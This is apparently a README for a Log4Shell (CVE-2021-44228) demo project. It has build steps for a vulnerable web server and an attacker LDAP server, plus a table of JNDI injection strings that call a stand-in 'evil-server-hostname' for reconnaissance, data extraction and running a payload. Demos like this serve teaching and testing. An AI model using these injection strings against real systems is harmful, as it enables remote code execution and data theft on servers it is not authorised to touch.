Share
## https://sploitus.com/exploit?id=E07F3BF4-D40A-54D4-91F2-89A8DA7608C2
# Odysseus

A demo of the Log4Shell ([CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)) vulnerability.

## Build Instructions

The vulnerable webserver and malicious LDAP server were both built and tested on JDK 1.8.0_181.

### Good Guys Web Server

1. Inside `goodguys`, run `gradlew bootJar`
2. Run vulnerable webserver using `java -jar build/libs/goodguys-0.0.1-SNAPSHOT.jar`

### Bad Guys LDAP/Web Server

1. Inside `badguys`, run `mvn package`
2. Run evil server using `java -jar .\target\evil-server.jar`

> Note: Windows defender may quietly move `target\classes\Exploit.class` to quarantine.

## Evil Payload

The malicious commands are defined inside [Exploit.java](/badguys/src/main/java/Exploit.java#L18).

## Injection Trigger

| Input                                                                    | Remarks                                                                                                   |
| ------------------------------------------------------------------------ | --------------------------------------------------------------------------------------------------------- |
| `${jndi:ldap://evil-server-hostname:389/Recon}`                          | Checks if the target is vulnerable by listening to a connection request to the LDAP server.               |
| `${jndi:ldap://evil-server-hostname:389/Recon [log4j Pattern Layout(s)]` | Append any valid log4j pattern latyouts to collect the data from target and display in attacker terminal. |
| `${jndi:ldap://evil-server-hostname:389/Exploit}`                        | Run the payload.                                                                                          |

## References

https://securityboulevard.com/2019/01/exploiting-jndi-injections-in-java/
https://logging.apache.org/log4j/1.2/apidocs/org/apache/log4j/PatternLayout.html  
https://www.ibm.com/blog/how-to-detect-patch-log4j-vulnerability/